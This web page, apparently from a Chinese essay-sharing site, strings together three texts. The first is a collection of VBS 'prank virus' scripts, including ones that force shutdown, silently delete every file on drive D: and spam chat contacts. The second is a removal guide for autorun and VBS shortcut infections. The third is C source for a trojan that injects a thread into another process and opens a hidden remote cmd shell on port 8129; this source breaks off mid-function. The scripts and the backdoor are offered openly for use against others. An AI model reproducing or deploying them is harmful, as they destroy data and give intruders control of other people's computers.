篇一:整人病毒vbs大全
新建一个记事本 把代码复制进去 重名名为vbs格式的就可以了
解除这个vbs脚本的办法就简单了 只要关掉任务管理器里Wscript.exe这个进程就好了
1、你打开好友的聊天对话框,然后记下在你QQ里好友的昵称,把下面代码里的xx替换一下,就可以自定义发送QQ信息到好友的次数(代码里的数字10改一下即可). xx.vbs=>
---------------------------------------------------------------------------
代码如下:
On Error Resume Next
Dim wsh,ye
set wsh=createobject("wscript.shell")
for i=1 to 10
wscript.sleep 700
wsh.AppActivate("与 xx 聊天中")
wsh.sendKeys "^v"
wsh.sendKeys i
wsh.sendKeys "%s"
next
wscript.quit
---------------------------------------------------------------------------
2、我就用这个程序放在学校图书馆查询书刊的机器上,好多人都那它没办法,哈哈 ---------------------------------------------------------------------------
代码如下:
do
msgbox "You are foolish!"
loop
---------------------------------------------------------------------------
3、直接关机
---------------------------------------------------------------------------
代码如下:
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "shutdown -f -s -t 00",0 ,true
---------------------------------------------------------------------------
4、删除D:\所有文件
---------------------------------------------------------------------------
代码如下:
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
---------------------------------------------------------------------------
5、不断弹出窗口
---------------------------------------------------------------------------
代码如下:
while(1)
msgbox "哈哈 你被耍了!"
loop
---------------------------------------------------------------------------
6、不断按下alt+f4 (开什么都关闭……)病毒太强必须关机才行! ---------------------------------------------------------------------------
代码如下:
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
while(1)
WSHshell.SendKeys "%{F4}"
Wend
---------------------------------------------------------------------------
7、按500次回车
(以下代码在运行者的电脑上显示500个对话框。其中 do until s=500 更改)
---------------------------------------------------------------------------
代码如下:
dim s
do until s=500
s=s+1
msgbox "哥们,给我按500次回车吧",64
loop
---------------------------------------------------------------------------
500可以随意,
8、关不掉的窗口
---------------------------------------------------------------------------
代码如下:
WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName) WScript.Echo("你是可爱的小朋吗?")
WScript.Echo("哈,我想你拉,这你都不知道吗?")
WScript.Echo("怎么才来,说~是不是不关心我")
WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。")
WScript.Echo("小强很生气,后果很严重哦。")
WScript.Echo("嘿嘿!你也会很惨滴哦")
WScript.Echo("是不是想清除我?")
WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")
WScript.Echo("还剩49下,快点点哦")
WScript.Echo("还剩48下,快点,小笨蛋!")
WScript.Echo("还剩47下对,就这样快点点!")
WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。") WScript.Echo("还剩45下,记得要快哦!")
WScript.Echo("还剩43下")
WScript.Echo("还剩42下")
WScript.Echo("还剩41下")
WScript.Echo("还剩40下")
WScript.Echo("还剩39下")
篇二:电脑中病毒后处理方法大全
中病毒后,盘符内文件夹都成了快捷方式的解决方法
前些天一客户的电脑拿过来,说电脑坏了,里面的文件夹都成了快捷方式了,
网上找了下教程,摸索了一下,总结出两种方法,希望对大家有帮助。
两种处理方法。
第一种解决方式如下:
1、在安全模式下启动,删除有关“smss”及“vba”的启动项!
2、用WINDOWS PE启动(没有PE就用安全模式似乎也可以,未做仔细测试),
将搜索出来的所有“.VBS”、以及“smss*.vbs”文件删除,有的在资源管理器中看不到到wiar中删除即可!
3、删除所有以文件夹命名的快捷方式(该病毒目前不传染子文件夹)
4、有的变种修改了“c:\windows\explorer.exe”及“c:\windows\system32\smss.exe”文件,
最好到同样版本系统的机器上将这两个文件复制回来,没有相同版本的文件不复制应该也可以。
5、利用“kill_folder2.11”这个软件恢复所有被隐藏的文件夹,见附件!
6、在注册表中删除所有有关“:.vba”的值中的“:.vba”字符!
第二种,其实就是中了WSCRIPT.EXE这样伪病毒。
WSCRIPT.EXE本身并不是病毒
一些.VBS病毒、autorun.inf利用WSCRIPT.EXE传播。看你的情况像是.VBS的。 方法1:
1、重装系统,不动除C盘外的其它盘。完成后不要做任何其它操作。(如果C盘、桌面有重要文件,请先备份)
2、关闭所有驱动器的自动运行功能,这步非常重要,如果不会,百度一下吧。
3、显示出所有系统文件(不会的朋友先百度下),用点击右键打开的方法,打开其它盘,就能看到快捷方式和病毒,这些可以全部删掉。(千万不要因为好奇或失误双击啊,不然系统就白装了) 方法2
1 运行→gpedit.msc→计算机配置→windows设置→安全设置→软件限制策略→其他规则→点“操作”→新路径规则→点“浏览”找到在
c:\windows\system32\WSCRIPT.EXE→“安全级别”设为不允许的
2 用IceSword禁止进程创建。结束WSCRIPT.EXE和windows\system\svchost.exe进程。
3 然后设置把隐藏文件放出来,把所有盘(C:D:E:F:......)下的.vbs文件和快捷方式、autorun.inf都删掉
4 修改注册表,显示被隐藏的正常文件夹。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
"CheckedValue"=dword:00000001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN
"CheckedValue"=dword:00000002
5 删除病毒加载项:
展开HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Windows
删除load键值项的数据。
6 如果我的电脑还不能双击打开,需要还原下系统我的电脑上的DEF盘上的文件夹全变成快捷方式了,而且都变得很小还打不开,有什么办法能彻底删除那个病毒,而且不要重装系统啊??
20
[ 标签:,, ]
文件全变成了快捷方式,而且打不开,有什么除了重装系统之外的方法能去掉病毒啊。
还有是不是和一个叫 AUTORUN.inf 的东西有关、、
﹎.海児^:^ 回答:4 人气:36 解决时间:2009-12-02 14:27
满意答案
AutoRun.inf为自动播放病毒:重装系统,格式化系统盘也清除不掉此病毒; 确定不是AutoRun.inf防疫程序的话用下面的方法来进入清除此病毒。。。。
电脑左下角开始运行然后输入cmd,分别进入每个盘的根目录,dir /a
看有没有autorun,然后删掉.
建议安装NOD32升级后进入安全模式全盘杀毒!!!
如果上面的两方法不能解决下面是具体的清除办法
一 、杀毒工具清除:
1:下载Autorun删除工具1.0,
下载地址: /Soft/jbh123Soft/200703/Autorun.rar 2:费尔木马强力清除助手( http://dl.filseclab.com/down/powerrmv.zip),它可以抑制病毒的在生。方法如下:
第一步:打开费尔木马强力清除助手。
第二步:在文件名后面输入“D:\Autorun.inf”(不包括“”),在把抑制文件再次生成选上(见图3),点击清除即可。其它盘符同理,C盘除外。
第三步:重新做下系统便可恢复正常,如果有GHOST的朋友直接恢复就OK了。 第四步:重做系统后可能每个盘符下都会有残留,只要将电脑现设置成显示所有文件就可看到。将其手动删除就可以了。
二、手动清除办法:
建议到安全模式下,网上有许多网友说直接搜索sms.exe文件删除是不可以的,因为一删除后,只要你刷新就立刻出现。
1、关闭病毒进程
Ctrl Alt Del 任务管理器,在进程中查找 sxs 或 SVOHOST(不是SVCHOST,相差一个字母),有的话就将它结束掉(并不是所有的系统都显示有这个进程,没有的就略过此步)。
2、恢复注册表(有的系统可能病毒没有修改注册表,检验办法是,如果您的系统能看到隐藏文件那么这步可以省略,建议大家都看一下)
(删除病毒自启动项)打开注册表 运行——regedit
HKEY_LOCAL_MACHINE>;SOFTWARE>;Microsoft>;Windows>;CurrentVersion>;Run SVOHOST.exe 或 sxs.exe
下找到 SoundMam(注意不是soundman,只差一个字母) 键值,可能有两个,删除其中的键值为 C:\\WINDOWS\system32\SVOHOST.exe 的(显示出被隐藏的系统文件)
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL,将CheckedValue键值修改为1
这里要注意,病毒会把本来有效的DWORD值CheckedValue删除掉,新建了一个无效的字符串值CheckedValue,类型为REG_SZ,并且把键值改为0!将这个改为1是毫无作用的。CheckedValue后面的类型,正确的是“RED_DWORD”而不是“REG_SZ”(有部分病毒变种会直接把这个CheckedValue给删掉,只需和下面一样,自己再重新建一个就可以了)
方法:删除此CheckedValue键值,单击右键 新建——Dword值——命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”。在文件夹——工具——文件夹选项中将系统文件和隐藏文件设置为显示
3、删除病毒体文件
在分区盘上单击鼠标右键——打开,看到每个盘跟目录下有 autorun.inf 和 sxs.exe 两个文件,将其删除。
最彻底的删除办法是:单击开始--运行--cmd 确定后在dos状态下写如下命令(一般系统盘跟目录下可能没有病毒体文件,但是其他盘应该都存在)
三、重装法
解决方法如下:先格c盘重装系统,然后只在c盘操作,千万不可打开其他盘,否则前功尽弃!!!!但可以用“文件打开方式”选择其他盘的程序,如重装后
用 wiar解压缩东西。 把你的杀软也装C盘也(下载、拷 都可),升级,杀其他盘。 卡巴瑞星都可以用。建议确认无毒、常用软件装好后做个GHOST镜像,一劳永逸了。
。
注意:三种方法操作时都不要双击盘符点开硬盘,最好只在C盘桌面进行操作。因为一双击病毒就重新感染,刚重装也没用。不得不打开其他硬就右键打开吧,或者用资源管理器。 若需用U盘拷东西(杀毒软件),要确保其无毒(可去他人机子上查杀下)
四.带不开硬盘分区的解决方法
多种方法解决分区无法双击打开的故障。
在“我的电脑”中,有时候你会遇到这样的情况,双击硬盘分区的盘符,根本无法打开,而只能先运行“资源管理器”再去打开硬盘分区。其实,这是因为你中了Autorun病毒造成的。有些杀毒软件即使查杀了Autorun病毒,也会引起双击分区打不开的“后遗症”。如何治疗这个顽症呢?试试下面的方法吧。
1.删除文件
打开“我的电脑”,依次单击“工具→文件夹选项→查看”,选中“显示所有文件和文件夹”后“确定”,然后用“资源管理器”打开各个分区,若发现各分区根目录下有autorun.inf隐藏文件,删除它们并重启电脑。
2.重新设置打开方式
同样打开“我的电脑”,依次单击“工具→文件夹选项→文件类型”,找到“驱动器”并选中,然后单击“高级”按钮,弹出“编辑文件类型”窗口,再单击“新建”,如图,在操作里输入“open”,在“用于执行操作的应用程序”里输入“explorer.exe”,点“确定”后返回到“编辑文件类型”窗口,选中“open”且单击“设为默认值”,最后单击“确定”,重新启动电脑试试看。
3.修改注册表法
打开注册表编辑器,定位至“HKEY_CLASSES_ROOT\Drive\shell”分支,将其下的键值全部删除,保存后退出注册表编辑器。
如何避免中Autorun.inf的招呢?
只要在U盘的根目下建立一个文件夹,名字就叫Autorun.inf,因为在同一目录下,同名的文件和文件夹是不能共存的。这样病毒就无法再创建Autorun.inf文件了...
篇三:病毒代码大全
制造木马病毒代码大全2008-06-08 19:46 制造木马病毒代码大全 一个简单的木马原型基础代码 添加上自己的XXX,加上变态的壳,做点小修改,就可
以..... #include #pragma comment(lib,"ws2_32.lib") #include #include #pragma comment(lib,"Shlwapi.lib") #include #include #include //参数结构 ; typedef struct _RemotePara { DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD
dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; // 提升应用级调试权限 BOOL EnablePrivilege(HANDLE hToken,LPCTSTR
szPrivName,BOOL fEnable); // 根据进程名称得到进程ID DWORD GetPidByName(char *szName); // 远程线程执行体 DWORD __stdcall ThreadProc(RemotePara *Para)
{ WSADATA WSAData; WORD nVersion; SOCKET
listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (__stdcall *PLoadLibrary)(char*); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall
*PGetModuleHandle)(HMODULE); FARPROC
PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile;
FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc =
(PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc =
(PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll); PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket =
(FARPROC)Para->dwSocket; Phtons =
(FARPROC)Para->dwhtons; Pbind =
(FARPROC)Para->dwbind; Plisten =
(FARPROC)Para->dwlisten; Paccept =
(FARPROC)Para->dwaccept; Psend =
(FARPROC)Para->dwsend; Precv =
(FARPROC)Para->dwrecv; Pclosesocket =
(FARPROC)Para->dwclosesocket; PCreateProcessA =
(FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile =
(FARPROC)Para->dwReadFile; PCloseHandle =
(FARPROC)Para->dwCloseHandle; PCreatePipe =
(FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox; nVersion =
MAKEWORD(2,1); PWSAStartup(nVersion,
(LPWSADATA)&WSAData); listenSocket =
PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family = AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr =
INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize); // Psend(clientSocket, Para->telnetmsg, 60, 0);
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory 是C 运行库函数,可以直接调用 si.dwFlags =
STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1;
if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformatio n))return 0; while(1)
{ memset(Para->Buff,0,4096);
PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break; if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break; }else { lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0); if(lBytesRead <=0 ) break; if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break; } } PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara
myRemotePara,*pRemotePara; DWORD pID;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有